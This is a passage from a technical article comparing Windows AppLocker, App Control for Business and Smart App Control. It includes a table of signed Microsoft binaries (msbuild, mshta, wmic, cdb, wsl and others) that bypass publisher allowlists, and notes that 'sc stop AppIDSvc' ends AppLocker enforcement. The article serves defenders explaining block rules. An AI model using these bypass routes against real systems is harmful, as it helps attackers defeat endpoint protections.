&lt;li&gt;&lt;strong&gt;&lt;code&gt;dotnet.exe&lt;/code&gt;&lt;/strong&gt; -- Jimmy Bayne, August 2019 [@bohops-dotnet-awl]. The shipping .NET host with the same fundamental capability as &lt;code&gt;dnx.exe&lt;/code&gt; but with a 2019-vintage attack surface and a live PoC against both AppLocker and WDAC.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The operational entries practitioners encounter most often are &lt;code&gt;msbuild.exe&lt;/code&gt; (the C# / MSBuild compiler that can execute inline build tasks), &lt;code&gt;mshta.exe&lt;/code&gt; (the HTML application host), &lt;code&gt;wmic.exe&lt;/code&gt; (which can load XSL stylesheets that execute arbitrary script), &lt;code&gt;wscript.exe&lt;/code&gt; (Windows Script Host), and &lt;code&gt;bash.exe&lt;/code&gt; / &lt;code&gt;wsl.exe&lt;/code&gt; (the WSL launchers, which provide an entirely separate execution environment outside the policy&apos;s reach).&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Binary&lt;/th&gt;
&lt;th&gt;Capability that enables the bypass&lt;/th&gt;
&lt;th&gt;Original researcher&lt;/th&gt;
&lt;th&gt;Source&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;code&gt;cdb.exe&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Debugger scripting facility executes shellcode in memory&lt;/td&gt;
&lt;td&gt;Matt Graeber, Aug 2016&lt;/td&gt;
&lt;td&gt;[@exploit-monday-cdb-wayback]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;csi.exe&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;C# interactive compiler, &lt;code&gt;Assembly.Load()&lt;/code&gt; over arbitrary C#&lt;/td&gt;
&lt;td&gt;Casey Smith, Sep 2016&lt;/td&gt;
&lt;td&gt;[@subt0x10-csi-wayback]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;dnx.exe&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Early .NET Core host, loads arbitrary assemblies&lt;/td&gt;
&lt;td&gt;Matt Nelson, Nov 2016&lt;/td&gt;
&lt;td&gt;[@enigma0x3-dnx-2016]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;addinprocess.exe&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Visual Studio add-in host loads attacker DLL&lt;/td&gt;
&lt;td&gt;James Forshaw, Jul 2017&lt;/td&gt;
&lt;td&gt;[@tiraniddo-dg-2017]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;dotnet.exe&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Modern .NET host, AWL bypass via assembly loading&lt;/td&gt;
&lt;td&gt;Jimmy Bayne, Aug 2019&lt;/td&gt;
&lt;td&gt;[@bohops-dotnet-awl]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;msbuild.exe&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Inline &lt;code&gt;Task&lt;/code&gt; in build XML compiles and runs C# at build time&lt;/td&gt;
&lt;td&gt;community&lt;/td&gt;
&lt;td&gt;[@ms-appcontrol-bypass]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;mshta.exe&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;HTA host evaluates VBScript / JScript&lt;/td&gt;
&lt;td&gt;community&lt;/td&gt;
&lt;td&gt;[@ms-appcontrol-bypass]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;wmic.exe&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;XSL stylesheet evaluation runs arbitrary script&lt;/td&gt;
&lt;td&gt;community&lt;/td&gt;
&lt;td&gt;[@ms-appcontrol-bypass]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;bash.exe&lt;/code&gt; / &lt;code&gt;wsl.exe&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Launches WSL kernel, an environment outside App Control&lt;/td&gt;
&lt;td&gt;community&lt;/td&gt;
&lt;td&gt;[@ms-appcontrol-bypass]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;&lt;strong&gt;The structural limit being demonstrated.&lt;/strong&gt; A publisher-gate allowlist cannot evaluate what a signed binary will &lt;em&gt;do&lt;/em&gt; after it starts. If the policy allows Microsoft-signed code, it has no way to know that &lt;code&gt;msbuild.exe&lt;/code&gt; will compile and execute attacker-supplied C# at runtime. The same kind of structural ceiling that applied to AppLocker&apos;s user-mode evaluator applies to App Control&apos;s publisher gate. Different mechanism, different layer; same kind of structural ceiling.&lt;/p&gt;

flowchart LR
    A[&quot;Signed binary loads&quot;] --&amp;gt; B[&quot;Policy admits publisher&quot;]
    B --&amp;gt; C[&quot;Binary starts&quot;]
    C --&amp;gt; D[&quot;Binary reads attacker-controlled input&quot;]
    D --&amp;gt; E[&quot;Attacker-controlled code runs&quot;]
    note[&quot;No policy-time check can prevent this&quot;]
    E -. observed by .- note
&lt;p&gt;&lt;strong&gt;The community corpus.&lt;/strong&gt; Jimmy Bayne&apos;s &lt;code&gt;bohops/UltimateWDACBypassList&lt;/code&gt; [@github-ultimatewdacbypass] preserves per-binary attribution to Forshaw, Smith, Nelson, Graeber, Moe, and others. Pair with the LOLBAS Project [@lolbas-project] as the cross-platform &lt;a href=&quot;https://paragmali.com/blog/living-off-the-land-on-windows-the-lolbin-catalog-and-the-st/&quot; rel=&quot;noopener&quot;&gt;LOLBin catalogue&lt;/a&gt; and you have the empirical record the Recommended Block Rules canonicalise.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Microsoft&apos;s response was institutional, not architectural.&lt;/strong&gt; Publish the inverse list and update it continuously. The Microsoft Recommended Block Rules policy is the canonical mitigation [@ms-appcontrol-bypass]. Snapshots of the page through 2019, 2020, 2022, and 2023 show a monotonically growing enumeration: a handful of entries at first, around forty by 2026, with each addition traceable to a named-researcher write-up.Matt Graeber&apos;s original 2016 &lt;code&gt;cdb.exe&lt;/code&gt; write-up URL &lt;code&gt;www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html&lt;/code&gt; now serves an unrelated 2011 NTFS-ADS post (also by Graeber, but pre-cdb-era). The verbatim August 2016 LOLBin post is preserved in the Wayback Machine [@exploit-monday-cdb-wayback]. The attribution is independently triangulated by the Microsoft Recommended Block Rules page itself (&lt;em&gt;&quot;Microsoft recognizes ... Matt Graeber&quot;&lt;/em&gt;) [@ms-appcontrol-bypass] and by &lt;code&gt;bohops/UltimateWDACBypassList&lt;/code&gt; [@github-ultimatewdacbypass].&lt;/p&gt;
&lt;p&gt;The article must state plainly: &lt;em&gt;&quot;App Control with the Recommended Block Rules&quot;&lt;/em&gt; and &lt;em&gt;&quot;App Control without them&quot;&lt;/em&gt; are not the same product. The block list is load-bearing.&lt;/p&gt;

DO NOT consider any application whitelisting solution to be secure against a bored member of staff. -- James Forshaw, *DG on Windows 10 S* [@tiraniddo-dg-2017]
&lt;p&gt;&lt;strong&gt;Operational cost is non-zero.&lt;/strong&gt; The &lt;code&gt;webclnt.dll&lt;/code&gt; block in the Recommended Block Rules has a documented practitioner side effect. Peter Upfold&apos;s July 2024 write-up [@upfold-webclnt-word-hang] documents a 5-15 second Word &quot;not responding&quot; hang on OneDrive / SharePoint saves caused specifically by that block, on machines with App Control for Business enforcing the Microsoft Recommended Block Rules. The mitigation has a cost. Honest deployment means measuring the cost against the threat it addresses.&lt;/p&gt;

Peter Upfold reported in July 2024 [@upfold-webclnt-word-hang] that *&quot;users were experiencing a 5-15 second delay when saving a document to OneDrive or SharePoint, during which Word would show as &apos;not responding.&apos; All machines in question use App Control for Business (WDAC).&quot;* The cause was the `webclnt.dll` entry in the Microsoft Recommended Block Rules, which blocks the WebDAV redirector. WebDAV is the underlying transport Office uses for some OneDrive / SharePoint save paths. The block exists because `webclnt.dll` has historically been used by attackers to coerce NTLM authentication to attacker-controlled UNC paths; the side effect is a Word hang on legitimate saves. This is the texture of *&quot;App Control with the Recommended Block Rules&quot;*: not theoretical, not free.
&lt;p&gt;&lt;strong&gt;Tie back to the thesis.&lt;/strong&gt; The bypass corpus does &lt;em&gt;not&lt;/em&gt; undermine App Control&apos;s security-boundary status. It underlines that without the Recommended Block Rules, an App Control &lt;em&gt;&quot;allow all Microsoft-signed code&quot;&lt;/em&gt; policy is not a coherent security policy. The boundary holds &lt;em&gt;because&lt;/em&gt; Microsoft and the community continuously update the inverse list.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The MSRC servicing-criteria classification of App Control as a security feature assumes the Recommended Block Rules are merged into the policy. An App Control deployment that allows Microsoft-signed code without the Block Rules is enforcement-of-a-name, not enforcement-of-a-capability. The single most-skipped step in production deployments is the merge of the Recommended Block Rules and the Vulnerable Driver Blocklist into the active policy.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If both AppLocker and App Control have structural ceilings, and Microsoft maintains them both, the question is not &lt;em&gt;&quot;which one is correct?&quot;&lt;/em&gt; It is: &lt;em&gt;what is Microsoft&apos;s third application-control product, who is it for, and how does it relate to the first two?&lt;/em&gt; That is Smart App Control.&lt;/p&gt;
&lt;h2&gt;9. Smart App Control -- The Adjacent Consumer Application&lt;/h2&gt;
&lt;p&gt;Windows 11 22H2 ships on September 20, 2022 [@blogs-windows-22h2-launch] [@ms-lifecycle-win11-enterprise]. Microsoft introduces &lt;strong&gt;Smart App Control&lt;/strong&gt; (SAC) for consumer Windows. It runs on the same kernel CI machinery as App Control for Business [@ms-smart-app-control]. It is &lt;em&gt;not&lt;/em&gt; App Control for Business. Why is it a distinct product?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The mechanism.&lt;/strong&gt; SAC uses the same &lt;code&gt;ci.dll&lt;/code&gt; evaluator as App Control for Business. Its decision source is ISG, with a fallback to &lt;em&gt;&quot;valid signature from a Trusted Root CA&quot;&lt;/em&gt; when ISG has no verdict [@ms-smart-app-control]. On an eligible clean install of Windows 11 22H2 or later, SAC starts in evaluation mode and either moves to enforcement or turns itself off, depending on whether Microsoft assesses the device as a good fit.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The product is categorically different.&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;em&gt;Unmanaged&lt;/em&gt;: no admin policy, no GPO, no Intune authoring surface.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;All-or-nothing&lt;/em&gt;: there is no per-app rule list. Either SAC is on for the device, or it is off.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Auto-disables silently&lt;/em&gt;: when the device&apos;s telemetry suggests SAC would be disruptive, it can disable itself without prompting the user [@ms-smart-app-control].&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Enterprise-managed devices keep it off&lt;/em&gt;: SAC stays off if &lt;em&gt;&quot;your device is enterprise-managed or developer-mode has been configured&quot;&lt;/em&gt; [@ms-support-sac-faq].&lt;/li&gt;
&lt;/ul&gt;

A consumer-grade Windows 11 application-control feature that uses the same kernel CI evaluator as App Control for Business but provides no policy authoring surface. SAC consults the Intelligent Security Graph for reputation and a Trusted Root CA signature fallback for unknown binaries. SAC is binary: on (enforcing for the device) or off. On eligible clean installs of Windows 11 22H2 and later for unmanaged consumer devices, it starts in evaluation mode and then turns on or off [@ms-smart-app-control] [@ms-support-sac-faq].
&lt;p&gt;&lt;strong&gt;The 2026 update most older write-ups still get wrong.&lt;/strong&gt; SAC can be re-enabled without a clean install on current Windows versions. The Microsoft Support FAQ [@ms-support-sac-faq] states: &lt;em&gt;&quot;Recent Windows updates allow Smart App Control to be enabled within the Windows Security App without requiring a clean installation&quot;&lt;/em&gt; and &lt;em&gt;&quot;Recent Windows updates allow Smart App Control to be re-enabled without requiring a clean installation.&quot;&lt;/em&gt; If you read a blog post that claims SAC requires a Windows 11 reinstall to enable, that post pre-dates these updates. The current SAC state-machine vocabulary is &lt;em&gt;evaluation mode&lt;/em&gt; (not &lt;em&gt;audit mode&lt;/em&gt;) [@ms-smart-app-control].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The widely-cited 2022-era guidance that &lt;em&gt;&quot;to turn on Smart App Control, a Windows 11 reinstall is required&quot;&lt;/em&gt; is no longer true [@ms-support-sac-faq]. Microsoft has shipped the in-place enable / re-enable surface in the Windows Security app. If your reading list still warns of the reinstall requirement, the warning is empirically outdated as of 2026.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The Microsoft documentation about SAC is itself inconsistent on this point. The &lt;em&gt;Smart App Control overview&lt;/em&gt; developer page still says SAC &lt;em&gt;&quot;can only be enabled on a clean install of a version of Windows that contains the Smart App Control feature&quot;&lt;/em&gt; and lists &lt;em&gt;&quot;A clean Windows install&quot;&lt;/em&gt; as a SAC requirement [@ms-smart-app-control], while the Microsoft Support FAQ [@ms-support-sac-faq] documents the in-place re-enable surface. The FAQ is the more current source and is the one Microsoft updates when servicing changes the behaviour; the developer overview page lags. Practitioners reading the two pages back-to-back should treat the FAQ as authoritative for current Windows.&lt;/p&gt;
&lt;p&gt;Why SAC is &lt;em&gt;not&lt;/em&gt; &quot;WDAC for consumers&quot;: the enforcement engine is approximately the same, but the product is categorically different. Unmanaged, all-or-nothing, ISG-gated, silently auto-disables. The kernel is the same; the management story is the inverse. The FAQ in section 15 flags this misconception explicitly.&lt;/p&gt;
&lt;p&gt;Three products now sit in the inventory: AppLocker, App Control for Business, Smart App Control. The practitioner question is no longer &lt;em&gt;&quot;which one is best?&quot;&lt;/em&gt; It is &lt;em&gt;&quot;which one fits which deployment?&quot;&lt;/em&gt; That is the job of the next section.&lt;/p&gt;
&lt;h2&gt;10. Side-by-Side Comparison -- The Practitioner Matrix&lt;/h2&gt;
&lt;p&gt;Most comparisons of AppLocker and App Control are organised by feature inventory. That answers the wrong question. Organise the comparison by &lt;em&gt;what the security practitioner actually needs to decide&lt;/em&gt;, and the line between the two becomes obvious.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Practitioner-decision dimension&lt;/th&gt;
&lt;th&gt;AppLocker&lt;/th&gt;
&lt;th&gt;App Control for Business&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;MSRC servicing-criteria classification&lt;/td&gt;
&lt;td&gt;Defense-in-depth (not a security feature) [@ms-appcontrol-applocker-overview]&lt;/td&gt;
&lt;td&gt;Security feature when signed policy and HVCI [@ms-appcontrol-applocker-overview]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Enforcement locus&lt;/td&gt;
&lt;td&gt;User-mode &lt;code&gt;AppIDSvc&lt;/code&gt; + kernel &lt;code&gt;AppID.sys&lt;/code&gt; minifilter [@ms-applocker-architecture]&lt;/td&gt;
&lt;td&gt;Kernel &lt;code&gt;ci.dll&lt;/code&gt; (HVCI: VTL1) [@ms-hvci]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Survives &lt;code&gt;SYSTEM&lt;/code&gt;-equivalent attacker&lt;/td&gt;
&lt;td&gt;No -- &lt;code&gt;sc stop AppIDSvc&lt;/code&gt; ends enforcement&lt;/td&gt;
&lt;td&gt;Yes, when policy is signed and HVCI is on&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Per-user / per-group rules&lt;/td&gt;
&lt;td&gt;Yes [@ms-appcontrol-feature-availability]&lt;/td&gt;
&lt;td&gt;No (whole-device) [@ms-appcontrol-feature-availability]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Driver coverage&lt;/td&gt;
&lt;td&gt;No (drivers go through KMCS / DSE)&lt;/td&gt;
&lt;td&gt;Yes -- App Control policy can govern drivers as a peer of KMCS&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;.bat&lt;/code&gt; / &lt;code&gt;.cmd&lt;/code&gt; script enforcement&lt;/td&gt;
&lt;td&gt;Yes [@ms-applocker-rules]&lt;/td&gt;
&lt;td&gt;No -- script enforcement is host-cooperative and &lt;code&gt;cmd.exe&lt;/code&gt; is not enlightened [@ms-appcontrol-script-enforcement] [@ms-appcontrol-feature-availability]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Signing infrastructure required&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Internal code-signing PKI required for signed policy (the security-boundary configuration)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Reboot required to apply policy changes&lt;/td&gt;
&lt;td&gt;No (immediate take-effect through AppIDSvc)&lt;/td&gt;
&lt;td&gt;Yes for signed policies (because the trusted-signer set is sealed at boot)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GPO deployment&lt;/td&gt;
&lt;td&gt;Mature dedicated UI&lt;/td&gt;
&lt;td&gt;Single-policy XML through Administrative Templates -&amp;gt; System -&amp;gt; Device Guard&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MDM / Intune deployment&lt;/td&gt;
&lt;td&gt;AppLocker CSP (in maintenance) [@ms-applicationcontrol-csp]&lt;/td&gt;
&lt;td&gt;ApplicationControl CSP (multi-policy, where new feature work lands) [@ms-applicationcontrol-csp] [@ms-intune-app-control]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Active feature development&lt;/td&gt;
&lt;td&gt;None -- &lt;em&gt;&quot;isn&apos;t getting new feature improvements&quot;&lt;/em&gt; [@ms-appcontrol-applocker-overview]&lt;/td&gt;
&lt;td&gt;Yes -- multi-policy cap removed April 2024 [@ms-appcontrol-multi-policy], Server 2025 OSConfig integration [@techcommunity-osconfig-server-2025]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Canonical bypass corpus&lt;/td&gt;
&lt;td&gt;Oddvar Moe &lt;code&gt;UltimateAppLockerByPassList&lt;/code&gt; [@github-ultimateapplockerbypass]&lt;/td&gt;
&lt;td&gt;Jimmy Bayne &lt;code&gt;bohops/UltimateWDACBypassList&lt;/code&gt; [@github-ultimatewdacbypass]; Microsoft Recommended Block Rules [@ms-appcontrol-bypass]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The table does not say &lt;em&gt;&quot;AppLocker bad, App Control good.&quot;&lt;/em&gt; It says the two are &lt;strong&gt;non-substitutable&lt;/strong&gt;. AppLocker gives you per-user policy on devices that do not have a code-signing PKI. App Control gives you a real security boundary on devices that do.&lt;/p&gt;
&lt;p&gt;Every &lt;em&gt;&quot;App Control = Yes&quot;&lt;/em&gt; row in the security-boundary direction is gated on the policy being signed and HVCI being on. Every &lt;em&gt;&quot;AppLocker = Yes&quot;&lt;/em&gt; row in the per-user direction comes with the user-mode-service ceiling. The article repeats these gating conditions in the prose so the reader does not over-read the table.&lt;/p&gt;

flowchart TB
    subgraph Quad[&quot;Threat-model fit&quot;]
        AL[&quot;AppLocker&lt;br /&gt;per-user yes, admin-resistant no&lt;br /&gt;(operational hygiene)&quot;]
        AC[&quot;App Control for Business&lt;br /&gt;per-user no, admin-resistant yes&lt;br /&gt;(security boundary, when signed and HVCI)&quot;]
        SAC[&quot;Smart App Control&lt;br /&gt;per-user no, admin-resistant partial&lt;br /&gt;(consumer, unmanaged)&quot;]
        None[&quot;No allowlist&lt;br /&gt;per-user no, admin-resistant no&lt;br /&gt;(default Windows)&quot;]
    end

The comparison table is intentionally pitched at the practitioner-decision layer. It does not show audit-mode behaviour (both products support it), the specific Event Log IDs (AppLocker logs to `Microsoft-Windows-AppLocker/*`, App Control to `Microsoft-Windows-CodeIntegrity/*`), the reboot semantics for unsigned vs signed App Control policies (unsigned changes can take effect without reboot in some configurations; signed changes require a reboot to refresh the trusted signer set), or the specific PowerShell cmdlet inventory. These details matter operationally and are covered on Microsoft Learn [@ms-appcontrol-applocker-overview] [@ms-applicationcontrol-csp]; they do not change the decision shape and are excluded from the comparison for word budget.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; AppLocker and App Control for Business are non-substitutable. The line between them is not &lt;em&gt;new&lt;/em&gt; vs &lt;em&gt;old&lt;/em&gt;; it is &lt;em&gt;per-user without PKI&lt;/em&gt; vs &lt;em&gt;security boundary with PKI&lt;/em&gt;. A deployment that needs both -- per-user policy on some collections and a real security boundary on others -- runs both side by side, which is exactly the configuration Windows 11 24H2 supports.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The table makes the &lt;em&gt;what&lt;/em&gt; explicit. The &lt;em&gt;why both still ship&lt;/em&gt; is still left implicit. The next section makes the case explicit, including the load-bearing negative citation that AppLocker is &lt;strong&gt;not&lt;/strong&gt; on Microsoft&apos;s deprecated-features page as of February 2026.&lt;/p&gt;
&lt;h2&gt;11. Why Both Still Ship -- and Why &quot;AppLocker Is Deprecated&quot; Is Folklore&lt;/h2&gt;
&lt;p&gt;A line that has circulated in community summaries since 2023: &lt;em&gt;&quot;AppLocker is being sunsetted, migrate to WDAC.&quot;&lt;/em&gt; Is that line true?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The load-bearing negative citation.&lt;/strong&gt; As of the February 2, 2026 update of Microsoft Learn&apos;s &lt;em&gt;Deprecated features in the Windows client&lt;/em&gt; page [@ms-deprecated-features], &lt;strong&gt;AppLocker is not on the list&lt;/strong&gt;. The page enumerates features Microsoft has formally deprecated -- WMIC, PowerShell 2.0, NTLM, DirectAccess, Maps, EdgeHTML, Paint 3D, the LPR/LPD print services, the UWP Map control. AppLocker is not among them.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;What Microsoft does say&lt;/strong&gt;, taken verbatim from the &lt;em&gt;App Control and AppLocker Overview&lt;/em&gt; page [@ms-appcontrol-applocker-overview]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;As established in §4, Microsoft&apos;s own servicing-criteria language disqualifies AppLocker as a security feature [@ms-appcontrol-applocker-overview]; the load-bearing point for &lt;em&gt;this&lt;/em&gt; section is the second half of the same page.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&quot;Although AppLocker continues to receive security fixes, it isn&apos;t getting new feature improvements.&quot;&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;

Although AppLocker continues to receive security fixes, it isn&apos;t getting new feature improvements. -- Microsoft Learn, *App Control and AppLocker Overview* [@ms-appcontrol-applocker-overview]
&lt;p&gt;The October 8, 2024 cumulative update KB5044288 (OS Build 25398.1189, Windows Server, version 23H2) confirms the &lt;em&gt;&quot;continues to receive security fixes&quot;&lt;/em&gt; claim with a concrete servicing fix [@ms-kb-5044288]: the release notes specifically include &lt;em&gt;&quot;[AppLocker] Fixed: The rule collection enforcement mode is not overwritten when rules merge with a collection that has no rules. This occurs when the enforcement mode is set to &apos;Not Configured.&apos;&quot;&lt;/em&gt; The fix shipped on the Server SKU first; the AppLocker code path is shared, so the fix appears on the client SKUs through their parallel monthly servicing. AppLocker is in maintenance mode, not deprecation.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Five reasons AppLocker still ships in 2026.&lt;/strong&gt;&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Reason&lt;/th&gt;
&lt;th&gt;Practitioner consequence&lt;/th&gt;
&lt;th&gt;Source&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Per-user rules&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;App Control is whole-device. Multi-user terminal-server, Citrix VDI, and education labs need per-user policy.&lt;/td&gt;
&lt;td&gt;[@ms-appcontrol-feature-availability]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;No signing infrastructure required&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;App Control&apos;s tamper-resistance story requires an internal code-signing PKI; AppLocker requires none.&lt;/td&gt;
&lt;td&gt;[@ms-appcontrol-applocker-overview]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;GPO ergonomics&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;AppLocker has a mature dedicated GPO UI; App Control GPO deployment is single-policy format only (multi-policy requires the &lt;code&gt;ApplicationControl&lt;/code&gt; CSP).&lt;/td&gt;
&lt;td&gt;[@ms-applicationcontrol-csp]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Installed base&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Existing AppLocker deployments work; ripping them out for a different security model has migration cost without a forced trigger.&lt;/td&gt;
&lt;td&gt;[@ms-appcontrol-applocker-overview]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Threat-model fit&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Some organisations only need to keep end users from running random downloads -- the &lt;em&gt;operational hygiene&lt;/em&gt; threat model. AppLocker fits that model and admits its scope.&lt;/td&gt;
&lt;td&gt;[@ms-appcontrol-applocker-overview]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The first reason is the load-bearing one. The kernel &lt;code&gt;ci.dll&lt;/code&gt; evaluator does not consult per-user token context as a policy input; the App Control policy is whole-device by design. Until that changes, any environment whose risk model depends on different rule sets for different user identities -- terminal servers, RDS hosts, Citrix VDI, education labs, kiosks shared by multiple users -- has to keep AppLocker even if every other dimension would point toward App Control.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The community-folklore correction.&lt;/strong&gt; The &lt;em&gt;&quot;AppLocker is deprecated&quot;&lt;/em&gt; line is not Microsoft&apos;s position. The Microsoft position is the comparative one in &lt;em&gt;App Control and AppLocker Overview&lt;/em&gt;: App Control is the recommended security feature; AppLocker is the supported parallel option for the scenarios above. The strongest defensible characterisation of AppLocker&apos;s roadmap is &lt;em&gt;&quot;feature complete, not actively developed, continues to receive security fixes&quot;&lt;/em&gt; -- not &lt;em&gt;&quot;deprecated.&quot;&lt;/em&gt; Microsoft&apos;s &lt;em&gt;Deprecated features in the Windows client&lt;/em&gt; page reinforces this in an unexpected direction [@ms-deprecated-features]: when the page deprecated Microsoft Defender Application Guard for Office, it recommended transitioning to &lt;em&gt;&quot;Microsoft Defender for Endpoint attack surface reduction rules along with Protected View and Windows Defender Application Control&quot;&lt;/em&gt; -- a Microsoft-curated recommendation that names App Control as the forward-looking layer, not the legacy one.The KB5044288 October 2024 fix [@ms-kb-5044288] is the concrete proof-point that the &lt;em&gt;&quot;security fixes&quot;&lt;/em&gt; claim is observable. It addresses a specific AppLocker rule-merge bug. A genuinely deprecated feature does not get bug fixes shipped on Patch Tuesday two years after rename.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The phrase frequently appears in community summaries, conference slides, and migration-vendor sales decks. It is not in Microsoft Learn. AppLocker is not on the deprecated-features list [@ms-deprecated-features] as of February 2026, it continues to receive security fixes [@ms-kb-5044288], and Microsoft Learn explicitly preserves it for the scenarios where App Control is not a substitute [@ms-appcontrol-applocker-overview]. If your migration plan rests on the assumption that AppLocker will be removed soon, the assumption does not have a public Microsoft commitment behind it.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If both still ship, the natural next question is not which one to use today but where the &lt;em&gt;ceiling&lt;/em&gt; for any allowlist mechanism is. That ceiling is structural, it is the same for AppLocker, App Control, and SAC, and the research community has named it.&lt;/p&gt;
&lt;h2&gt;12. Theoretical Limits -- What No Allowlist Can Do&lt;/h2&gt;
&lt;p&gt;The publisher-gate structural limit shown in section 8 was specific to App Control. Here is the more general version of the same observation: &lt;em&gt;application control cannot evaluate side effects.&lt;/em&gt; The same ceiling applies to AppLocker, App Control, SAC, ISG, every Microsoft Recommended Block Rules iteration, &lt;em&gt;and every third-party product in the same market.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The structural claim is folklore-level but universally observed; no published impossibility theorem yet states it formally. The closest standard result is &lt;strong&gt;Rice&apos;s theorem&lt;/strong&gt;: any non-trivial &lt;em&gt;behavioural&lt;/em&gt; property of a Turing-complete program is undecidable in the general case. A publisher-gate allowlist asks a behavioural question -- &lt;em&gt;&quot;will this binary do something that violates policy?&quot;&lt;/em&gt; -- and answers it with a structural fact -- &lt;em&gt;&quot;who signed it?&quot;&lt;/em&gt; The mismatch is not a defect of any individual allowlist product; it is a working bound the field treats as a corollary of Rice. The policy evaluator runs &lt;em&gt;before&lt;/em&gt; the binary starts. It knows what the binary &lt;em&gt;is&lt;/em&gt; -- the signer subject, the file hash, the path on disk, the Authenticode metadata. It does not know what the binary will &lt;em&gt;do&lt;/em&gt;. If &lt;code&gt;msbuild.exe&lt;/code&gt; is signed by Microsoft and the policy allows Microsoft-signed binaries, the policy has no way to know that &lt;code&gt;msbuild.exe&lt;/code&gt; will then read an attacker-controlled &lt;code&gt;.csproj&lt;/code&gt; file containing an inline 